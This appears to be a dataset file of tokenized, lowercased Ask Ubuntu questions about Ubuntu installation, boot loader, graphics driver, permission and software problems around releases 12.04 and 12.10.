232272	how do i restore pendrivelinux boot load menu after accidental overwrite ?	i have a usb drive with ubuntu created from pendrivelinux.com . i 've been running it off the usb drive to play with linux on various machines without a problem . i recently installed ubuntu to a hard drive from the usb drive using the usb boot loader 's menu option ( versus the `` install to hard drive '' option found on the live-usb desktop ) . most everything installed correctly . however the installer overwrote the boot loader on the usb drive and never installed it on the fixed disk such that i could n't boot the machine without the usb drive . i found this thread that helped me to correct the fixed disk boot problem . but i am still unable to boot to the usb installation . i 've been searching for a couple days but most of what comes up are articles describing how to set up a bootable usb with linux on it . i 've poked around on the usb drive to see if there 's some obvious boot loader config file but i ca n't find anything that seems like a candidate to change . i have very limited knowledge of linux so i do n't know where to look or how to approach this problem . i did look at this post , but it was n't of any help . i could repave the bootable usb drive but since the original setup i have created a persistence disk , installed apps , and have various personal settings and such on the usb install . i 'd rather not do this when i imagine all i need to do is restore the pendrivelinux boot menu . at this point , i 'm backing up all the files on the usb drive to another machine and may attempt the repave with the hope that i can somehow restore only the changed/persisted part of the usb drive . ( and unfortunately i 've run out of usable usb drives on which i could do a fresh install of bootable ubuntu in order to compare that against the messed up one to see what could be restored . )
232274	12.04 glxinfo gives badrequest error ( intel ivy bridge integrated graphics )	i 'm a recent ubuntu migrant ( i was running windows 7 until early this year ) and i think i 'm having some issues with my graphics . i did a fresh 12.04 64 bit install on a new build , the specs of which are : asrock z77 pro3 intel i5 3470 ( with integrated ivy bridge hd2500 graphics ) intel 330 series 120gb ssd ( boot ) 8gb ram i initially found out something was wrong when i tried to start minecraft for the first time and it crashed after i attempted to login , giving me the following error : x error - disp : 0x7f36b000e0c0 serial : 31 error : badrequest ( invalid request code or no such operation ) request_code : 136 minor_code : 14 to get minecraft working , i followed suggestions like updating the lwjgl , which did n't affect the error in minecraft . further reading suggested a issue with my graphics so i updated the x drivers for intel and mesa utils , but glxinfo still gives a similar output to the error in minecraft : x error of failed request : badrequest ( invalid request code or no such operation ) major opcode of failed request : 136 ( glx ) minor opcode of failed request : 19 ( x_glxqueryserverstring ) serial number of failed request : 12 current serial number in output stream : 12 lspci recognises the graphics controller as vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) but the system details under 'settings ' displays the graphics drivers as blank . i am also unable to login to unity 3d , even though i select `` ubuntu '' at the login menu , it boots to unity 2d regardless ( there 's no option available for me to change the launcher icon size which i believe is a feature of unity 3d ) . as background to my issue ( in case it is relevant ) , the fresh install of 12.04 on the new build was n't without problems . my liveusb booted with graphics glitches similar to this person so i had to boot with nomodeset in the grub boot menu to do the install . the glitches were still there when i booted to the install though , so i followed suggestions to modify my grub config to always boot with nomodeset . i 've since reversed what i did to the grub config file ( edited out the nomodeset option and did 'update-grub ' ) as i read that an update would cure my graphics glitch issues ( and it seems to have ) . i had a previous install of 12.04 running on my laptop and i wanted to migrate my settings over , so i backed up my laptop 's home folder using deja dup and restored it to my destop installation as per a suggestion i found . this worked quite well with a few adjustments that had to be made ( e.g . update file system references in deluge ) . i 've done a lot of searching to see if i could solve this issue myself and save having to post a question , but so far i think my limited familiarity with ubuntu and linux is letting me down . please let me know if you need any additional info and i appreciate any help you can offer a noob .
232275	ubuntu 12.04.1 lts fails to find intel hd graphics 3000 and video playing error	hello i 'm new to linux i 'm using toshiba c850 notebook and i ca n't install ' intel hd graphics 3000 ' driver on ubuntu 12.04.1 lts ( 32 bit ) the problem is when i play hd movies , video is not smoothly playing . and every time i boot up my notebook on ubuntu i have to adjust my screen brightness.it goes maximum level every time i restart my notebook.but in windows it works fine and hd videos play smoothly . please help friends . thanks
232280	wubi installation on external drive and installation options	i have 2 questions : 1 ) can i install ubuntu on an external drive using the windows installer ? and if i can and then remove the external drive from my computer , what will happen then ? 2 ) what 's the difference between an installation size of 5gb and 9gb ( and others ) ?
232284	installing usb 2.0 video grabber with audio	i got usb 2.0 video grabber with audio by monoprice as a gift from my brother and i ca n't get it to work on ubuntu 12.10 , and i am still new to ubuntu . ubuntu wont read the device at all when plugged in . so any help is accepted deeply . link of the device [ http : //www.monoprice.com/products/product.asp ? c_id=108 & cp_id=10810 & cs_id=1081003 & p_id=5616 & seq=1 & format=2 ]
232286	cedarview video driver does n't work with intel dn2800mt motherboard	i updated my computer today with the latest kernel and video driver for the cedarview chipset by intel and after i reboot i only see vertical stripes on the monitor . i also tried using the vnc viewer to login to the system and the connection is refused . i have seen some aricles about custom edits to the ubuntu configuration . does anyone know how i can modify the latest updates to get it working ? thanks in advance .
232292	blank cursor after installing ubuntu 12.10 on laptop with nvidia geforce graphics card	installed ubuntu off a usb and system loaded and correctly installed the first time . used the desktop gui and loaded firefox but when clicked back to 'return to desktop ' or the like , the monitor mashed with multi colour pixels and crashed the os in a frozen state . since then every attempt to load has ended with : a ) a black screen with a flashing cursor ( unable to type anything ) b ) the ubuntu loading screen with the dots changing colors and when i press escape i get the error : unable to open '/dev/sda ' stdin : not a typewriter sometimes i can get to the busybox console if i wait long enough/am lucky enough . [ edit 1 : following these great instructions ( my computer boots to a black screen , what options do i have to fix it ? ) it seems i need to boot to grub by pressing shift on boot up and making some changes . ] [ edit 2 : i personally ca n't get grub open no matter how much i hold down shift , try mashing shift , etc , aparently it 's the right shift you need to press . best bet seems to be to install a grub boot disk . do n't have access to any other ubuntu worskstations , will attempt to burn this as an iso to a cd . http : //www.supergrubdisk.org/category/download/supergrub2diskdownload and use the cd to boot ] [ edit 3 : super grub worked ! but did n't report good things . ran 'detect any operating system' error : unknown filesystem ran 'list devices/partitions' device hd0 : no known filesystem detected.. partition hd0 , msdos5 : no known filesystem detected.. partition hd0 , msdos1 : filesystem type ext*.. [ edit 4 : final update what i think is happening is that my hard drive had two partitions on it . the first partition was a few hundred megs , the second with the rest is where ubuntu installed itself to . im thinking that after it crashed the first time due to possibly not having the nvidia drivers installed or otherwise just from reading bad sectors from this 4 year old laptops harddrive that it then screwed the master boot record or suchlike . i found a linux version called parted magic which lets you run a version of linux and repartion the drive . i reset the master boot record using this tool and it did n't help and i think i am finally out of ideas and ready to give up . ]
232296	is it possible to encrypt ubuntu 12.04 filesytem without erasing data	i 'm using acer notebook with windows7 and ubuntu 12.04 lts desktop installed in separate drive . i want to encrypt my ubuntu file system . i was trying with truecrypt . in windows 7 i 'm not getting any drive where i installed ubuntu to encrypt using truecrypt . also i 'm using grub for os selection . in ubuntu truecrypt is saying `` truecrypt can encrypt system partitions only under windows . '' i think truecrypt needs to format ubuntu drive that 's why it is saying this . is there any way to do encryption without erasing data ? if it ca n't be done then what can i do for encryption of my ubuntu data . encryption is mandatory for me . please help me to get out of these problem as i 'm trying for 3 day 's and nothing comes fruitful . thanks in advance .
232299	unable to boot windows 8 after ubuntu 12.04 installation	i just got my new notebook with windows 8 pre installed . after installing ubuntu 12.04 when i try to boot windows 8 it says `` automated recovery in progress '' which fails afterwards and shuts down the machine stating the partition on which windows is installed is locked . actually during the ubuntu installation i merged two disk drives to one and made it as an extended partition . then i divided the extended partition into two logical partition . one of which is blank and other is having ubuntu installed . i had tried to back up the data from ubuntu but i was not able to see the files of the partition containing windows 8 . please help me to recover windows 8 or to back up the data . output of sudo fdisk -l device boot start end blocks id system /dev/sda1 63 2047 992+ 42 sfs partition 1 does not start on physical sector boundary . /dev/sda2 * 2048 718847 358400 42 sfs /dev/sda3 718848 478152703 238716928 42 sfs /dev/sda4 478154750 1465147391 493496321 5 extended partition 4 does not start on physical sector boundary . /dev/sda5 478154752 687869951 104857600 83 linux /dev/sda6 687872000 1465147391 388637696 7 hpfs/ntfs/exfat
232300	assign group rights to folder	hello i am new with ubuntu and i have a question . i created a user abc . i created a group xyz . i added user abc to group xyz . i have a folder mounted mydrive . i mounted it under as i have attached drive to server /mnt/mydrive . i want xyz group-users to have read and write rights , as i am going to use the mydrive for ftp and in future . if i have a new user , i will add the user in group xyz for the same rights . please note : i do not want the user to delete the uploaded files . in short , i want to give group xyz rights to folder mydrive ; read and write rights only . many kind regards , osman
232305	missfont.log in home directory ?	on a clean install i get a file called missfont.log in my home directory as well as in other directories in which i open pdfs . i do n't want it there . how can i avoid this log to be created ? one of the following bug reports speaks of installing tetex-bin , but i can not find it : bug1 and bug2 .
232310	how can i install picasa into ubuntu 12.04 lts ?	i 'm using ubuntu 12.04 . i belong to photography jobs , so i need the picasa software which is powerd by google . but it 's unavailable in the ubuntu software center . gimp is also good but not as well as picasa . kindly inform me to how to install it .
232312	gnome 3 ( using gnome-shell ) very slow at startup	i 've got a problem with gnome-shell that i partially solved , but want to ask question of why it works that way and if you can help me with fixing it permanently . i am using ubuntu 12.10 , with installed gnome3 ( using gnome-shell ) . when i login ( even if i just unlogged from gnome ) to gnome session , everything starts ok , but gnome-shell takes about 20 % of cpu and its responses are very slow ( searching for applications takes around 30 seconds and so on ) . it is very annoying . but , when i kill gnome-shell process , and than start it by `` nohup gnome-shell & '' from terminal , it starts again , but now without any troubles , fast , like it should . can you help me how to fix this permanently ? ( it 's really annoying to kill and run gnome-shell after every session login , and also , it takes about 15-30 seconds to start again ) . i googled this problem and found out that there might be a problem with gnome-shell extensions . but when i open tweak-tool i find that i have no gnome-shell extensions , so there is nothing i can disable . thanks for any help .
232313	what gl libraries do i need to install the finite element toolkit ( fetk ) ?	trying to install `` the finite element toolkit `` in ubuntu 12.04 . downloaded the source file ( tar.gz ) for version 1.5 from here it has got a script to install all the tools that come with it , so when i run the script which in turn calls the ./configure script and it checks for missing and required dependencies . and it stops with an error as `` gl libraries missing but required.. exiting on error '' -- -- -- -- -- begin processing app configure options -- -- -- -- -- checking whether you want pedantic ansi compilation ... no checking whether you want profiling ... no checking whether you want electricfence ... no checking whether your environment defines fetk_motif_library ... no checking for xmgetcolors in -lxm ... no motif library missing but not required ... rocking on ... checking whether your environment defines fetk_gl_library ... no checking whether you need the macosx hack for opengl ... no checking for glpushmatrix in -lgl ... no configure : error : gl library missing but required ... exiting on error make : *** no rule to make target `install ' . stop . ~/desktop/fetk -- -- -- -- -- -- -- -- -- -- -- fetk-build : stopping -- -- -- -- -- -- -- -- -- -- -- while i have installed almost most of the graphical library packages like freeglut3 , freeglut3-dev , libglib-mesa , etc. , still the same error .
232314	ndiswrapper is n't working ?	so , i have a belkin components f7d4101 / f9l1101 802.11abgn wireless adapter and its installation disk with supplied drivers and such . i went about using ndisrapper , but to no prevail.. this is my first time using ndiswrapper , so i followed this tutorial . looking with ndiswrapper -l , my driver seems to be installed , but when i get to the point in the tutorial when he types ndiswrapper -m , it says , module configuration already contains alias directive module configuration already contains alias directive module configuration already contains alias directive i 've tried a simple reboot , but that did n't do anything , so can someone help ?
232316	how do i format a truecrypt-encrypted flashdrive ?	i encrypted a flashdrive using truecrypt , but now i 've changed my mind and i want to format it as an unencrypted drive . when i plug it in it is no longer appears on the launcher or in the nautilus sidebar ( until i mount it as an encrypted drive via truecrypt , which appears in the nautilus sidebar , but even then the flash drive itself is not recognised ) . how can i access/mount it in order to format it ?
232322	has unison error on `` file name too long ''	i 'm using unison for backup/file replication . unison has a problem with long file names - it does not sync files with long names error : failed : error in querying file information : file name too long over here the developer says about plans to fix that . any information weather this has been fixed in specific version ? i 've tried 2.40.102 - not fixed .
232323	should nitro pull in manual changes to todo.txt ?	i was very happy to find that nitro created a todo.txt containing the tasks i added in the application . i like editing a todo.txt manually . however , after doing so ( and syncing ) it appears that nitro does not pick up the changes . is this expected behaviour ? is it impossible to have a workflow incorporating both editing tasks in nitro and with a text editor in todo.txt ?
232329	what is the difference between a samba share and the nautilus share method ?	so , my server finally died ( good old 10 year old machine , minimum ) . i was running mandriva on it using samba to share some data areas for backups and storage ( had added a sata card and some 1tb drives ) . with it 's death i decided to switch to ubuntu.. i am running ubuntu 12.10 . i initially installed samba since that is what i was used to , but then noticed when in nautilus that , like in windows , i can right click and share . what is the difference between these sharing modes ? i can see my samba share but still have permissions to fix since i setup one of the old drives and it does n't have the right group ownership yet . but i `` right clicked shared '' another area and i can see that and use it right away from my windows boxes ... do i not even need to use samba any more ? should i ditch it for this other sharing method ? i did some searches but did n't find much , most likely i just do n't know the key words yet to use in my search.. unix : medium user ; ubuntu : newbie ! !
232330	function keys do n't work	i know this is a commonly asked question , but some function keys dont work ( fn + f5 , f6 , c , v and space ) . i got the asus eeepc f201e-kx067du which came shipped with ubuntu 12.04 lts and after the first boot-up every function key was working out of the box . i changed the os to ubuntu 12.10 and since then some fn keys did n't work anymore ( i also tried installing 12.04 lts again to see if those keys work again ) . i already searched for some hours now , without any results ... editing /etc/default/grub with : grub_cmdline_linux_default= '' nosplash acpi_osi=linux acpi_backlight=vendor '' or grub_cmdline_linux_default= '' nosplash acpi_osi= '' does n't seems to work .
232332	skype & cheese video	i can not view the webcam in skype or cheese . the webcam is working because it is viewable on the skype call at the other end and cheeses will take photos . also i can not view any incoming videos in skype . ubuntu 10.04 fujitsu amilo l7300 video card - via cn400/pm800/pm8080/pn800/pn880 s3 unichrome pro i have tried guvcview & skype 4 , but did not improve things . output from lsusb and lspci are : lsusb bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 002 : id 05c7:0113 qtronix corp. pc line mouse bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 003 : id 0c45:628f microdia pc camera with microphone ( sn9c202 + ov9650 ) bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub lspci 00:00.0 host bridge : via technologies , inc. cn333/cn400/pm880 host bridge 00:00.1 host bridge : via technologies , inc. cn333/cn400/pm880 host bridge 00:00.2 host bridge : via technologies , inc. cn333/cn400/pm880 cpu host bridge 00:00.3 host bridge : via technologies , inc. cn333/cn400/pm880 host bridge 00:00.4 host bridge : via technologies , inc. cn333/cn400/pm880 host bridge 00:00.7 host bridge : via technologies , inc. cn333/cn400/pm880 host bridge 00:01.0 pci bridge : via technologies , inc. vt8237/vx700 pci bridge 00:06.0 ethernet controller : marvell technology group ltd. 88w8335 [ libertas ] 802.11b/g wireless ( rev 43 ) 00:0c.0 cardbus bridge : ene technology inc cb1410 cardbus controller ( rev 01 ) 00:10.0 usb controller : via technologies , inc. vt82xxxxx uhci usb 1.1 controller ( rev 80 ) 00:10.1 usb controller : via technologies , inc. vt82xxxxx uhci usb 1.1 controller ( rev 80 ) 00:10.3 usb controller : via technologies , inc. usb 2.0 ( rev 82 ) 00:11.0 isa bridge : via technologies , inc. vt8235 isa bridge 00:11.1 ide interface : via technologies , inc. vt82c586a/b/vt82c686/a/b/vt823x/a/c pipc bus master ide ( rev 06 ) 00:11.5 multimedia audio controller : via technologies , inc. vt8233/a/8235/8237 ac97 audio controller ( rev 50 ) 00:11.6 communication controller : via technologies , inc. ac'97 modem controller ( rev 80 ) 00:12.0 ethernet controller : via technologies , inc. vt6102 [ rhine-ii ] ( rev 74 ) 01:00.0 vga compatible controller : via technologies , inc. cn400/pm800/pm880/pn800/pn880 [ s3 unichrome pro ] ( rev 02 ) 02:00.0 ethernet controller : marvell technology group ltd. 88w8335 [ libertas ] 802.11b/g wireless ( rev 03 )
232338	which linux os is the best for my notebook configuration as dual boot	i have an asus k42jy and installed ubuntu 12.10 as dual boot with win 8 . after installation i restart the system & choose ubuntu and get a blank screen with the ubuntu default color . after waiting long enough nothing comes screen remains same so i restart the system by pressing ctrl+alt+del & choose win8 but got the same result - disk read error . ctrl+alt+del to restart . both os are not working . i formatted my entire pc with win xp cd and delete all the partitions & boot repair , format hdd as ntfs by live usb . then i installed my win 8 again ... .i have spent lot of my quality time in quarrel with ubuntu . i think its maybe my processor problem . so can you suggest which linux distribution is the best fit for my notebook config asus k42jy intel® pentium® dual-core p6200 2.13ghz processor 14” ( 1366×768 ) widescreen 500gb hdd sata ati mobility™ radeon® hd 6470m-1gb ram 2gb
232339	how to add qt5 to qt creator ?	i 've added the qt5 daily repository , installed the qt5-meta-full and added /opt/qt5/bin/qmake to qt versions . now i get : -1 : error : unknown module ( s ) in qt : declarative is it possible yet to use qt5 with qt creator ?
232340	download ubuntu 11.10 for dell vostro 3360	where can i download manufacturer/preinstalled version of ubuntu 11.10 for dell vostro 3360 ? thanks .
232341	slow internet on ubuntu 12.10	i 've recently migrated from a windows 7 pc to ubuntu 12.10 64bit . ubuntu experience level : newbee . recommended/restricted updates installed . i 've added an nvidia binary driver for my display . the hardware build is , intel core2duo e8400 3.0ghz intel dp35dp mobo with onboard lan 2 gb ddr2 memory nvidia 8600 gt display adapter . i have the ubuntu 12.10 installed on an 8gb flash drive ( usb2.0 ) . also happy with general system performance with seamless hd video playback . the file tranfer speeds and download speeds are satisfactory and is par to my previous windows 7 performances . the internet browsing experience is weird and slow . most sites are loading very slowly and some are n't loading at all . i 've tried things on firefox 17 , opera 12.11 and chromium 22.0.1 , but issue persists . the opera lets me load some sites with turbo enabled . the flash streaming is fine with youtube but vimeo videos are n't loading . common sites like yahoo.com and hotmail are n't loading at all on firefox and chromium . opera with turbo enabled works at times.it even loads flickr.com thread page with turbo enabled . nload at fair traffic times return , incoming : curr : 208.39 kbit/s avg : 93.45 kbit/s min : 0.00 bit/s max : 756.08 kbit/s ttl:7.45 mbyte outgoing : curr : 11.43 kbit/s avg : 13.39 kbit/s min : 0.00 bit/s max : 131.33 kbit/s ttl:1.25 mbyte at the same time my system load indicator 3.0 applet returns , downspeed 60 kbps mine is a wired dsl @ 512mbps connection ( isp : bsnl , india ) . the ipv6 tests are giving me a green signal . i 've done a lot of searches on many forums but was n't able to get a working solution . even tried disabling ipv6 on firefox config . here is the ethtool result : ethtool -i eth0 driver : e1000e version : 2.0.0-k firmware-version : 1.3-0 bus-info : 0000:00:19.0 supports-statistics : yes supports-test : yes supports-eeprom-access : yes supports-register-dump : yes supports-priv-flags : no ethernet controller details : ~ $ lspci -nn | grep -i 'ethernet controller' 00:19.0 ethernet controller [ 0200 ] : intel corporation 82566dc-2 gigabit network connection [ 8086:294c ] ( rev 02 ) how can get my internet to run at optimal speeds ?
232342	displaying gnome classic instead gnome 3 with fglrx driver	i installed ubuntu 12.04 . i have 1gb amd graphics card . my gnome was working fine until i installed fglrx driver . after that whenever i try to go in gnome 3 it ends up with classic display . what should i do ? if i do n't install fglrx driver does that mean my graphics card will not be used ?
232345	how to install g95 in ubuntu 12.04	i need the detail information about how to install g95 in ubuntu 12.04 step by step . i have followed the g95 manual but it still did not work .
232346	i need windows 7 back !	i installed ubuntu 12.10 , but all the things i need are only on windows 7 so i got a bootable usb of windows xp , i tried to boot up from it , i saw the blinking dash which should be like a loading symbol but then grub tookover and like interrupted it . same thing with windows 7 and a release preview of 8 is there a way to boot with the usbs into windows installer or do i need a windows 7 installation disk ? please help , i need windows for my school projects and my own personal gaming . ps - i am running ubuntu 12.10 on a hp 2000 and i believe a 1.3ghz multi-core cpu with amd radeon graphics chip . pps - i have tried removing ubuntu totally ( gparted ) and then i boot up with windows bootable usb to try to do a clean install but then i get `` unknown file system , grub rescue > '' then i have to do some dumb file commands
232347	thunar disable video thumbnails only	is there a way in thunar ( within xfce ) to disable displaying of video thumbnails only and still allow picture thumbnails ? i found this thread : show me only picture thumbnails but that is for nautilus and i can not find thunar in that list anywhere . or preferrably only remote videos , nautilus used to only thumbnail local videos not remote . so if disabling for only remote is possible that would be better .
232353	ubuntu 12.10 graphics or booting issue	merry christmas everyone . yesterday i upgraded ubuntu from 12.04 to 12.10 . i have an intel integrated graphic card . i know it 's not compatible with the new version . ubuntu warned me about it , but i upgraded ubuntu anyway . my main idea is to disable unity 3d after the upgrade , or use cinnamon , but now i 'm facing problems ... i see the boot loader , i click ubuntu and then all i see is a purple screen , just that . i do n't see the loading screen or the login screen , just a purple screen . what to do ? can i fix it without removing 12.10 and reinstalling 12.04 ?
232358	how to make ubuntu recognize samsung galaxy battery level ?	when i plug in an iphone device , it automatically charges the battery , and showing battery 's power percentage . how to do so , with an android device ?
232362	i ca n't submit reviews/ratings in software center	if i try and submit a review it keeps loading quite some time with the message `` bewertung wird 端bertragen '' , which means `` rating is being submitted '' in german . for example i tried to review easystroke , but i had that problem with every package i 've tried to rate yet . i 'm using xubuntu 12.10 . do you know of any fix for this ?
232363	series of task to be done after a single stroke in easystroke gesture recognition	i use easystroke for many tasks like command , key combination , etc . now , i need to perform a series of tasks in a single stroke . for example : first i need to execute the command 'cryptkeeper ' . second , i need to execute 'gnome-terminal ' . third , i need to press key combination `` ctrl+c '' . fourth , i need to press 'up-arrow ' . then 'enter' ... here , i need to do step 1 to 4 with a single stroke in easystroke . is there any way to do this ? ?
232364	module 'efivars ' does not exist	several tutorials and how-to 's on ask ubuntu re uefi booting refer to efibootmgr as being capable of controlling a uefi boot . in all cases i have seen the tutorial asks you to modprobe efivars how can this be done when the kernel module efivars.ko does not exist in any ubuntu kernel that i can find . if you doubt me do these two things , firstly run the command sudo modprobe -l | grep efivars you will get no results . next go to packages.ubuntu.com and enter the search term efivars.ko in 'search the contents of packages ' . again you will get no results . debian have kernels with this module in it and so to arch . ubuntu however do not . or if they do they conceal them remarkably effectively . am i missing something - it is not unknown !
232368	ubuntu desktop 12.10 64-bit , icons do n't show	recently i had problems with fglrx cause i have an ati card , if i install the privative drivers from the ubuntu repo , i get no unity launch bar cause the drivers are not compatible with the new xorg . so , i installed manually the new beta drivers following the reponse of ryanpcmcquen in this question : ca n't install ati proprietary drivers in 12.10 because i have also a 5670 card . everything work , i get now from info : jdsampayo @ jdsampayo-m61pme-s2 : ~ $ fglrxinfo display : :0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : ati radeon hd 5670 opengl version string : 4.2.11995 compatibility profile context the problem is that when unity starts i do n't get any icons in desktop and right mouse clicks there also do nothing , but i get the unity bar working . if i launch ccsm and i disable the unity plugin ( bar dissapears ) and reenable it , the bar reappears and icons in desktop and right click mouse in desktop works as expected . is there any way to do this automatically ? ( disable and enable unity plugin ) because i must do this each login to make the desktop work . pd . i tried to put this info in the question i refer , but i have no reputation in askubuntu and could n't find a way to add any info or comments in questions .
232370	nexus 7 xfce install error	so i attempted to install package xubuntu-desktop on my nexus 7 , but it keeps getting this error : failed to fetch http : //ports.ubuntu.com/ubuntu-ports/pool/universe/x/xubuntu-meta/xubuntu-desktop_2.163_armhf.deb 404 not found is this something that can be fixed , or is xfce simply not compatible with the nexus 7 ?
232379	ubuntu 12.04 is hogging the battery power	i was using my computer the other day on my kitchen side . i wanted to move to the sofa and so i took the power cable out . i took about ten seconds to get to the sofa and plug it in and when i checked the power icon it said it would take 15 mins to charge fully . 15 mins ! i do n't know how it would that long to charge . i used to have windows vista ( that one day it got to the login screen and the option was 'other user ' ) and it was fine . how can i stop it doing this ? thanks in advance .
232381	no access to the entire drive on which ubuntu was installed	i just installed ubuntu 12.10 for the first time on my laptop that was shipped with windows 8 . since my laptop has a dual storage , it has the following drives : c : 128g ssd d : 750g hdd . i installed ubuntu on the d : drive such that it occupies only 200g of my d : drive so that i could use the rest of the storage for my windows . well that was my goal.. but it seems that windows 8 ca n't detect the entire d : drive after i installed ubuntu . it is not mounted at all . and even ubuntu detects only the installed partition of the d : drive , which means the rest 550g was invisible somehow . i have installed pysdm to fix mounting the drives , but it does not do any good since it does n't show the rest of the drive at all . where can i find the rest of the drive visible in both windows 8 and ubuntu ?
232385	flashplugin-installer errors	i have installed flashplugin-installer through synaptic and before have tried sudo apt-get install flashplugin-installer in lxterminal , and whenever i load google chrome/chromium and navigate to a site with anything flash i get an error message saying `` could not load shockwave flash . '' any help ? ( i 'm running lubuntu 12.10 when i get these error messages . they did n't appear for me when using ubuntu 12.04 lts before i switched to lubuntu for performance reasons . )
232386	are there linux distros running unity by default , besides ubuntu ?	i read that opensuse ported ubuntu 's unity desktop and made a repository , also available in fedora and arch . i was wondering if , besides ubuntu , any other distro ( or spin ) is using unity as default .
232392	installed xorg on server , no screens found	all : followed this link : https : //help.ubuntu.com/community/servergui performing startx says no screens found ... ? ? ?
232393	does a partition need to be mounted before data transfer to usb ?	i 'm trying to use ubuntu 12.04 to transfer data from an unbootable hard-drive in windows xp to a usb . does the partition need to be mounted beforehand ? also , i read i could use ddrescue to perform the transfer but it does n't seem operational on ubuntu 12.04 . any suggestions
232394	why ca n't i install libnotify in ubuntu 12.10 ?	my env : play @ ubuntu : ~ $ gem env rubygems environment : - rubygems version : 1.8.24 - ruby version : 1.9.3 ( 2012-11-10 patchlevel 327 ) [ x86_64-linux ] - installation directory : /home/play/.rvm/gems/ruby-1.9.3-p327-dev - ruby executable : /home/play/.rvm/rubies/ruby-1.9.3-p327-dev/bin/ruby - executable directory : /home/play/.rvm/gems/ruby-1.9.3-p327-dev/bin - rubygems platforms : - ruby - x86_64-linux - gem paths : - /home/play/.rvm/gems/ruby-1.9.3-p327-dev - /home/play/.rvm/gems/ruby-1.9.3-p327-dev @ global - gem configuration : - : update_sources = > true - : verbose = > true - : benchmark = > false - : backtrace = > false - : bulk_threshold = > 1000 - remote sources : - http : //rubygems.org/ when trying to install libnotify : play @ ubuntu : ~ $ sudo gem install ruby-libnotify building native extensions . this could take a while ... error : error installing ruby-libnotify : error : failed to build gem native extension . /usr/bin/ruby1.9.1 extconf.rb /usr/lib/ruby/1.9.1/rubygems/custom_require.rb:36 : in `require ' : can not load such file -- mkmf ( loaderror ) from /usr/lib/ruby/1.9.1/rubygems/custom_require.rb:36 : in `require' from /usr/lib/ruby/vendor_ruby/mkmf-gnome2.rb:13 : in ` < top ( required ) > ' from /usr/lib/ruby/1.9.1/rubygems/custom_require.rb:36 : in `require' from /usr/lib/ruby/1.9.1/rubygems/custom_require.rb:36 : in `require' from extconf.rb:11 : in ` < main > ' gem files will remain installed in /var/lib/gems/1.9.1/gems/ruby-libnotify-0.5.1 for inspection . results logged to /var/lib/gems/1.9.1/gems/ruby-libnotify-0.5.1/ext/gem_make.out
232395	handling gtk windows in kde4	i 've installed kde via sudo apt-get install kde-full and it worked perfectly , and all is well , except for these ugly gtk applications . ( pictures here ) so i did some research and came across this form here and i 've installed the two packages via sudo apt-get install kde-style-qtcurve gtk2-engines-qtcurve and i presume that they 're installed , however i can not figure out how to do the second part : gtk apps look like that unless you install those and tell kde to handle them with care , in system settings - > appearance - > gtk styles and fonts . gtk styles , use another style : qtcurve . then log out and back in . so my question is : in kde4 how do i accomplish the above ? thanks in advance for all of your help .
232396	how to make menu item rounded	hy , guys : ) i want to styling my ubuntu specifically in unity all context and global menu . i want to change it rounded like mac 's menu like this : how can make it like that ?
232401	delete user files on logout	i have to setup linux ubuntu pc , on which when user logout himself , all files on his account have to be deleted , so when next time he logs in , he will have environment like he is never been logged before . can you help me how to achieve this ? thank you in advance !
232404	i did not install postgresql , so why do i have postgresql related binaries in 12.04 ?	i am going to compile postgresql from source , but the system already has postgresql related binaries such as pg_config , which gives me a lot of environment variables etc when i run it . i did not install postgresql an i 've double checked from software manager . why do i have postgresql related files ? they lead to problems when i try to develop extensions with the custom compiled version of postgresql since various environment variables have already been configured .
232405	how do i set my clock in windows to utc / localtime ?	i have a dual boot and a i configured windows to use utc with a registry fix as explained in here : ubuntu 12.04 clocktime is off by 4 hours now , i need to come back to localtime again , and i have no idea about how to edit the windows ' registry to make it use local time again .
232410	how do you resolve hdmi overscan in ubuntu 12.04 lts on ivy bridge system ?	i built a htpc and am running 12.04 on it . my tv is a samsung un55es7100 . i tried adjusting the settings of the tv to fit wide screen , but that has n't resolved the issue . if i lower the resolution from ubuntu , the screen fits but it drastically changes the color of the display . i 'd like to use the 1080p if i can . any ideas ?
232416	my computer does'nt recognize the usb when booting	i managed to get to a screen where i can choose where to boot from , but only my cd/dvd drive and hard drive are there . i also managed to get a command line that looks like this : `` grub > `` is that helping ?
232427	how can i get rhythmbox to see that different albums with the same name are different ?	i have both greatest hits by the offspring and greatest hits by queen in my rhythmbox library . when i sort by album , it looks like this : how can i tell get rhythmbox to sort by album in such a way that it does n't interleave albums by different artists with the same name ?
232435	upgrading ubuntu without it removing packages	i 'm currently running ubuntu 11.10 and would like to upgrade , but the upgrade manager wants to remove several packages , such as cinnamon . is it possible to upgrade without it forcefully removing these packages and changing my ui to the unity interface ?
232436	going to a virtual terminal disables vim color scheme	when i 'm going into a virtual terminal my vim color scheme is ignored . i 've configured it by following this blog . heres all of my ~/.vimrc if $ colorterm == 'gnome-terminal' set term=gnome-256color set t_co=256 colorscheme railscasts else colorscheme default endif '' filetype support set filetype=on filetype plugin on filetype indent on '' color scheme and font autocmd filetype javascript , html , css , php colorscheme railscasts autocmd filetype javascript , html , css , php set gfn=monaco\ 10 '' indentation autocmd filetype javascript , html , css , php set ai autocmd filetype javascript , html , css , php set sw=4 autocmd filetype javascript , html , css , php set ts=4 autocmd filetype javascript , html , css , php set sts=4 autocmd filetype javascript , css , php set textwidth=79 '' enable autocompletion autocmd filetype javascript set omnifunc=javascriptcomplete # completejs autocmd filetype html set omnifunc=htmlcomplete # completetags autocmd filetype css set omnifunc=csscomplete # completecss '' enable line numbers autocmd filetype javascript , css , php set number '' enable incremental search autocmd filetype javascript , html , css , php set incsearch this part should have been fixed it right ? if $ colorterm == 'gnome-terminal' set term=gnome-256color set t_co=256 colorscheme railscasts else colorscheme default endif
